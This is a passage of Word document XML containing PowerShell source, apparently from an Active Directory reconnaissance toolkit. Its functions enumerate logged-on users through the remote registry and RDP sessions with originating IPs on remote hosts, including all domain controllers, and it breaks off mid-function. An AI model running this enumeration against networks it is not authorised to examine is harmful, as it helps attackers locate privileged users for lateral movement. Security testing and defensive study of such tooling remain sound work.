        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289E2146" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F5372" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE10E2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E91B41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C756B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05569CFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66D0C4E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-LoggedOnLocal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721F1148" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE6F3EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33281C1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24CB8903" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function will query the HKU registry values to retrieve the local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F53F0F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        logged on users SID and then attempt and reverse it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424FE209" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adapted technique from Sysinternal's PSLoggedOn script. Benefit over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F56DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D3AC08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        required (NetWkstaUserEnum requires remote admin access).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B89A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="195C5782" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Note: This function requires only domain user rights on the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695E488" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        machine you're enumerating, but remote registry must be enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CE1C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F1DE40F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Function: Get-LoggedOnLocal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C2F4B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: Matt Kelly, @BreakersAll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3294C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01817128" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDEB21E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="436417A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The ComputerName to query for active sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EBE5B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="01D86FFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CA335" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="021E1CD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-LoggedOnLocal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58456D39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A7C0CFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active sessions on the local host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040AF1E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32EEA9A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EEF56A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52498826" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-LoggedOnLocal -ComputerName sqlserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8ECD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DA23E63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active sessions on the 'sqlserver' host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24400660" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4741635F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E0CD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E8EE847" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B71954E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F799CF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27868798" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C94FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC34F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48517A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = 'localhost'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A912E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37508613" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27346431" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # process multiple host object types from the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF464C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ComputerName = Get-NameField -Object $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9CF05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4217F8A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA6EF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # retrieve HKU remote registry values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216ED258" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338835B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B8071DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # sort out bogus sid's like _class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599CE55A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7317A521" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $UserName = Convert-SidToName $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26D15B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="053A7F55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Parts = $UserName.Split('\')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30338951" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $UserDomain = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4427AD0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $UserName = $Parts[-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412700F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($Parts.Length -eq 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D3936" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $UserDomain = $Parts[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63687D8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA52ECA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6E00C76F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LocalLoggedOnUser = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFD52D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LocalLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1EFE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LocalLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DED0826" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LocalLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795E591E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LocalLoggedOnUser | Add-Member Noteproperty 'UserSID' $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338DC065" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LocalLoggedOnUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601ABD21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD67E0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE4AC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877ABF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error opening remote registry on '$ComputerName'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220C8C8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5678E00D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763842F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="676DDB50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C838751" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetRDPSession {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB26E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4440957B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB36B8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A31A7DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function will execute the WTSEnumerateSessionsEx and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E018036" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        WTSQuerySessionInformation Win32API calls to query a given</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA05091" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        RDP remote service for active sessions and originating IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F7FF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This is a replacement for qwinsta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761C6CBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B8451DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Note: only members of the Administrators or Account Operators local group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E45AF4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        can successfully execute this functionality on a remote target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32630E44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D2712C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F075DF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58AC9D21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname to query for active RDP sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7114D114" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="46A5E127" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB7CCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07AF599B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetRDPSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0D4B53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="320F9BF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active RDP/terminal sessions on the local host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDE893A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="434348A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07469BDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3AD6306C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetRDPSession -ComputerName "sqlserver"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460C6F7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="661DB020" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active RDP/terminal sessions on the 'sqlserver' host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFAB1CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B835704" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AE1CFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A9A8BA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomainController | Get-NetRDPSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC1747" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D45CC91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active RDP/terminal sessions on all domain controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C5C559" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2330A5C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C5375FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E25070" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34B740" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A66CE91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350F72FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBAED03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A236029" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = 'localhost'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2CD717" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544712A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DB609A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C8097" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFDFA8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13819099" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # open up a handle to the Remote Desktop Session host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C94F8D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Handle = $Wtsapi32::WTSOpenServerEx($Computer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B90AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E89E96D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # if we get a non-zero handle back, everything was successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCCFDBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($Handle -ne 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E7740" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5BA1B24F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # arguments for WTSEnumerateSessionsEx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542554B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ppSessionInfo = [IntPtr]::Zero</w:t>
      </w:r>
    </w:p>
